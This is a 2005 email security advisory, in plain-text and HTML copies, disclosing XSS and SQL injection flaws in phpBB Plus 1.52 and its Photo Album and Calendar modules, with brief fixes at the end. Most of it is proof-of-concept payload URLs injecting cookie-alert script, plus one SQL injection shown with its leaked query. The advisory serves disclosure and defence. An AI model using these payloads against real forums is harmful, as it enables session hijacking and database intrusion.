dc_phpbb_xss_sql.txt

`This is a multi-part message in MIME format.  
  
------=_NextPart_000_0009_01C5406C.5DF1F1F0  
Content-Type: text/plain;  
charset="iso-8859-1"  
Content-Transfer-Encoding: quoted-printable  
  
Dcrab 's Security Advisory  
[Hsc Security Group] http://www.hackerscenter.com/  
[dP Security] http://digitalparadox.org/  
  
Get Dcrab's Services to audit your Web servers, scripts, networks, etc. =  
Learn more at http://www.digitalparadox.org/services.ah  
  
Severity: Medium  
Title: Multiple Sql injection and XSS vulnerabilities in phpBB Plus =  
v.1.52 and below and some of its modules.  
Date: 13/04/2005  
  
Vendor: PhpBB2 Plus and Smartor  
Vendor Website: http://www.phpbb2.de, http://smartor.is-root.com/  
Summary: There are, multiple sql injection and xss vulnerabilities in =  
phpbb plus v.1.52 and below and some of its modules..  
  
Proof of Concept Exploits:=20  
  
PhpBB Plus v.1.52 and below  
http://localhost/groupcp.php?g=3D881&amp%3bsid=3D'%22%3E%3Cscript%3Ealert=  
(document.cookie)%3C/script%3E  
Pops cookie  
  
  
http://localhost/index.php?c=3D1&amp%3bsid=3D'%22%3E%3Cscript%3Ealert(doc=  
ument.cookie)%3C/script%3E  
Pops cookie  
  
  
http://localhost/index.php?c=3D'%22%3E%3Cscript%3Ealert(document.cookie)%=  
3C/script%3E&amp%3bsid=3D5e4b2554e73f8ca07f348b5f68c85217  
Pops cookie  
  
  
http://localhost/index.php?mark=3D'%22%3E%3Cscript%3Ealert(document.cooki=  
e)%3C/script%3E&amp%3bsid=3D5e4b2554e73f8ca07f348b5f68c85217  
Pops cookie  
  
  
http://localhost/portal.php?article=3D0&amp%3bsid=3D'%22%3E%3Cscript%3Eal=  
ert(document.cookie)%3C/script%3E  
Pops cookie  
  
  
http://localhost/portal.php?article=3D'%22%3E%3Cscript%3Ealert(document.c=  
ookie)%3C/script%3E&amp%3bsid=3D2fb087b5e3c7098d0e48a76a9c67cf59  
Pops cookie  
  
  
http://localhost/viewforum.php?f=3D1&amp%3bsid=3D'%22%3E%3Cscript%3Ealert=  
(document.cookie)%3C/script%3E  
Pops cookie  
  
  
http://localhost/viewtopic.php?p=3D58834&amp%3bsid=3D'%22%3E%3Cscript%3Ea=  
lert(document.cookie)%3C/script%3E  
Pops cookie  
  
  
Photo Album v2.0.53  
  
http://localhost/album_search.php?mode=3D'SQL_INJECTION&search=3Ddcrab  
SQL INJECTION  
  
DEBUG MODE  
  
SQL Error : 1064 You have an error in your SQL syntax. Check the manual =  
that corresponds to your MySQL server version for the right syntax to =  
use near 'LIKE '%\'SQL_INJECTION%' AND p.pic_cat_id =3D c.cat_id OR =  
p.pic_c  
  
SELECT p.pic_id, p.pic_title, p.pic_desc, p.pic_user_id, p.pic_username, =  
p.pic_time, p.pic_cat_id, p.pic_approval, c.cat_id, c.cat_title FROM =  
phpbb_album AS p,phpbb_album_cat AS c WHERE p.pic_approval =3D 1 AND =  
LIKE '%\'SQL_INJECTION%' AND p.pic_cat_id =3D c.cat_id OR p.pic_cat_id =  
=3D 0 AND p.pic_approval =3D 1 AND LIKE '%\'SQL_INJECTION%' ORDER BY =  
p.pic_time DESC  
  
Line : 105  
File : album_search.php  
  
  
http://localhost/album_cat.php?cat_id=3D5&amp%3bsid=3D'%22%3E%3Cscript%3E=  
alert(document.cookie)%3C/script%3E  
Pops cookie  
  
  
http://localhost/album_comment.php?pic_id=3D224&amp%3bsid=3D'%22%3E%3Cscr=  
ipt%3Ealert(document.cookie)%3C/script%3E  
Pops cookie  
  
  
Calender MOD  
http://localhost/calendar_scheduler.php?d=3D1113174000&mode=3D&start=3D'"=  
><script>alert(document.cookie)</script>&amp%3bsid=3Dd32836b8178e5d62b2b1=  
73ed177e4b0d  
Pops cookie  
  
  
Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), =  
mysql_real_escape_string() and other functions for input validation =  
before passing user input to the mysql database, or before echoing data =  
on the screen, would solve these problems.  
  
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah  
  
Author:=20  
These vulnerabilties have been found and released by Diabolic Crab, =  
Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to =  
contact me regarding these vulnerabilities. You can find me at, =  
http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for =  
my soon to come out book on Secure coding with php.  
------=_NextPart_000_0009_01C5406C.5DF1F1F0  
Content-Type: text/html;  
charset="iso-8859-1"  
Content-Transfer-Encoding: quoted-printable  
  
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">  
<HTML><HEAD>  
<META http-equiv=3DContent-Type content=3D"text/html; =  
charset=3Diso-8859-1">  
<META content=3D"MSHTML 6.00.2900.2604" name=3DGENERATOR>  
<STYLE></STYLE>  
</HEAD>  
<BODY bgColor=3D#ffffff>  
<DIV><FONT face=3DArial size=3D2>Dcrab 's Security Advisory<BR>[Hsc =  
Security Group]=20  
<A =  
href=3D"http://www.hackerscenter.com/">http://www.hackerscenter.com/</A><=  
BR>[dP=20  
Security] <A=20  
href=3D"http://digitalparadox.org/">http://digitalparadox.org/</A></FONT>=  
</DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>Get Dcrab's Services to audit your Web =  
servers,=20  
scripts, networks, etc. Learn more at <A=20  
href=3D"http://www.digitalparadox.org/services.ah">http://www.digitalpara=  
dox.org/services.ah</A></FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>Severity: Medium<BR>Title: Multiple Sql =  
injection=20  
and XSS vulnerabilities in phpBB Plus v.1.52 and below and some of its=20  
modules.<BR>Date: 13/04/2005</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>Vendor: PhpBB2 Plus and =  
Smartor<BR>Vendor Website:=20  
<A href=3D"http://www.phpbb2.de">http://www.phpbb2.de</A>, <A=20  
href=3D"http://smartor.is-root.com/">http://smartor.is-root.com/</A><BR>S=  
ummary:=20  
There are, multiple sql injection and xss vulnerabilities in phpbb plus =  
v.1.52=20  
and below and some of its modules..</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>Proof of Concept Exploits: =  
</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>PhpBB Plus v.1.52 and below<BR><A=20  
href=3D"http://localhost/groupcp.php?g=3D881&amp%3bsid=3D'%22%3E%3Csc=  
ript%3Ealert(document.cookie)%3C/script%3E">http://localhost/groupcp.php?=  
g=3D881&amp%3bsid=3D'%22%3E%3Cscript%3Ealert(document.cookie)%3C/scri=  
pt%3E</A><BR>Pops=20  
cookie</FONT></DIV>  
<DIV>&nbsp;</DIV><FONT face=3DArial size=3D2>  
<DIV><BR><A=20  
href=3D"http://localhost/index.php?c=3D1&amp%3bsid=3D'%22%3E%3Cscript=  
%3Ealert(document.cookie)%3C/script%3E">http://localhost/index.php?c=3D1&=  
amp;amp%3bsid=3D'%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E</A=  
><BR>Pops=20  
cookie</DIV>  
<DIV>&nbsp;</DIV>  
<DIV><BR><A=20  
href=3D"http://localhost/index.php?c=3D'%22%3E%3Cscript%3Ealert(document.=  
cookie)%3C/script%3E&amp%3bsid=3D5e4b2554e73f8ca07f348b5f68c85217">ht=  
tp://localhost/index.php?c=3D'%22%3E%3Cscript%3Ealert(document.cookie)%3C=  
/script%3E&amp%3bsid=3D5e4b2554e73f8ca07f348b5f68c85217</A><BR>Pops=20  
cookie</DIV>  
<DIV>&nbsp;</DIV>  
<DIV><BR><A=20  
href=3D"http://localhost/index.php?mark=3D'%22%3E%3Cscript%3Ealert(docume=  
nt.cookie)%3C/script%3E&amp%3bsid=3D5e4b2554e73f8ca07f348b5f68c85217"=  
>http://localhost/index.php?mark=3D'%22%3E%3Cscript%3Ealert(document.cook=  
ie)%3C/script%3E&amp%3bsid=3D5e4b2554e73f8ca07f348b5f68c85217</A><BR>=  
Pops=20  
cookie</DIV>  
<DIV>&nbsp;</DIV>  
<DIV><BR><A=20  
href=3D"http://localhost/portal.php?article=3D0&amp%3bsid=3D'%22%3E%3=  
Cscript%3Ealert(document.cookie)%3C/script%3E">http://localhost/portal.ph=  
p?article=3D0&amp%3bsid=3D'%22%3E%3Cscript%3Ealert(document.cookie)%3=  
C/script%3E</A><BR>Pops=20  
cookie</DIV>  
<DIV>&nbsp;</DIV>  
<DIV><BR><A=20  
href=3D"http://localhost/portal.php?article=3D'%22%3E%3Cscript%3Ealert(do=  
cument.cookie)%3C/script%3E&amp%3bsid=3D2fb087b5e3c7098d0e48a76a9c67c=  
f59">http://localhost/portal.php?article=3D'%22%3E%3Cscript%3Ealert(docum=  
ent.cookie)%3C/script%3E&amp%3bsid=3D2fb087b5e3c7098d0e48a76a9c67cf59=  
</A><BR>Pops=20  
cookie</DIV>  
<DIV>&nbsp;</DIV>  
<DIV><BR><A=20  
href=3D"http://localhost/viewforum.php?f=3D1&amp%3bsid=3D'%22%3E%3Csc=  
ript%3Ealert(document.cookie)%3C/script%3E">http://localhost/viewforum.ph=  
p?f=3D1&amp%3bsid=3D'%22%3E%3Cscript%3Ealert(document.cookie)%3C/scri=  
pt%3E</A><BR>Pops=20  
cookie</DIV>  
<DIV>&nbsp;</DIV>  
<DIV><BR><A=20  
href=3D"http://localhost/viewtopic.php?p=3D58834&amp%3bsid=3D'%22%3E%=  
3Cscript%3Ealert(document.cookie)%3C/script%3E">http://localhost/viewtopi=  
c.php?p=3D58834&amp%3bsid=3D'%22%3E%3Cscript%3Ealert(document.cookie)=  
%3C/script%3E</A><BR>Pops=20  
cookie</DIV>  
<DIV>&nbsp;</DIV>  
<DIV><BR>Photo Album v2.0.53</DIV>  
<DIV>&nbsp;</DIV>  
<DIV><A=20  
href=3D"http://localhost/album_search.php?mode=3D'SQL_INJECTION&searc=  
h=3Ddcrab">http://localhost/album_search.php?mode=3D'SQL_INJECTION&se=  
arch=3Ddcrab</A><BR>SQL=20  
INJECTION</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>DEBUG MODE</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>SQL Error : 1064 You have an error in your SQL syntax. Check the =  
manual=20  
that corresponds to your MySQL server version for the right syntax to =  
use near=20  
'LIKE '%\'SQL_INJECTION%' AND p.pic_cat_id =3D c.cat_id OR p.pic_c</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>SELECT p.pic_id, p.pic_title, p.pic_desc, p.pic_user_id, =  
p.pic_username,=20  
p.pic_time, p.pic_cat_id, p.pic_approval, c.cat_id, c.cat_title FROM =  
phpbb_album=20  
AS p,phpbb_album_cat AS c WHERE p.pic_approval =3D 1 AND LIKE =  
'%\'SQL_INJECTION%'=20  
AND p.pic_cat_id =3D c.cat_id OR p.pic_cat_id =3D 0 AND p.pic_approval =  
=3D 1 AND LIKE=20  
'%\'SQL_INJECTION%' ORDER BY p.pic_time DESC</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>Line : 105<BR>File : album_search.php</DIV>  
<DIV>&nbsp;</DIV>  
<DIV><BR><A=20  
href=3D"http://localhost/album_cat.php?cat_id=3D5&amp%3bsid=3D'%22%3E=  
%3Cscript%3Ealert(document.cookie)%3C/script%3E">http://localhost/album_c=  
at.php?cat_id=3D5&amp%3bsid=3D'%22%3E%3Cscript%3Ealert(document.cooki=  
e)%3C/script%3E</A><BR>Pops=20  
cookie</DIV>  
<DIV>&nbsp;</DIV>  
<DIV><BR><A=20  
href=3D"http://localhost/album_comment.php?pic_id=3D224&amp%3bsid=3D'=  
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E">http://localhost/a=  
lbum_comment.php?pic_id=3D224&amp%3bsid=3D'%22%3E%3Cscript%3Ealert(do=  
cument.cookie)%3C/script%3E</A><BR>Pops=20  
cookie</DIV>  
<DIV>&nbsp;</DIV>  
<DIV><BR>Calender MOD<BR><A=20  
href=3D"http://localhost/calendar_scheduler.php?d=3D1113174000&mode=3D=  
&start=3D'"><script>alert(document.cookie)</script>&amp%3bsi=  
d=3Dd32836b8178e5d62b2b173ed177e4b0d">http://localhost/calendar_scheduler=  
.php?d=3D1113174000&mode=3D&start=3D'"><script>alert(doc=  
ument.cookie)</script>&amp%3bsid=3Dd32836b8178e5d62b2b173ed177e=  
4b0d</A><BR>Pops=20  
cookie</DIV>  
<DIV>&nbsp;</DIV>  
<DIV><BR>Possible Fixes: The usage of htmlspeacialchars(),=20  
mysql_escape_string(), mysql_real_escape_string() and other functions =  
for input=20  
validation before passing user input to the mysql database, or before =  
echoing=20  
data on the screen, would solve these problems.</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>Keep your self updated, Rss feed at: <A=20  
href=3D"http://digitalparadox.org/rss.ah">http://digitalparadox.org/rss.a=  
h</A></DIV>  
<DIV>&nbsp;</DIV>  
<DIV>Author: <BR>These vulnerabilties have been found and released by =  
Diabolic=20  
Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel =  
free to=20  
contact me regarding these vulnerabilities. You can find me at, <A=20  
href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A> =  
or <A=20  
href=3D"http://digitalparadox.org/">http://digitalparadox.org/</A>. =  
Lookout for my=20  
soon to come out book on Secure coding with =  
php.</DIV></FONT></BODY></HTML>  
  
------=_NextPart_000_0009_01C5406C.5DF1F1F0--  
`